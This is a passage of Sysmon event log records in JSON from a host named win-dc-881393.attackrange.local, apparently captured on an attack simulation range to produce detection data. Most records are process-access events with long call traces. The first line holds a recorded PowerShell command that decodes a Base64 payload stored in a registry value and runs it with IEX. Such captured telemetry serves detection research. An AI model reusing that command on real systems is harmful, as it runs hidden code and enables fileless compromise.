$EncodedCommand\npowershell.exe -Command \\\"\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\\\"\"} ","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nSourceProcessId: 4368\r\nSourceThreadId: 600\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98252ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976e8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4230(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","SourceProcessId":"4368","SourceThreadId":"600","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010D8350A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98252ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976e8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4230(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010D8350A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dl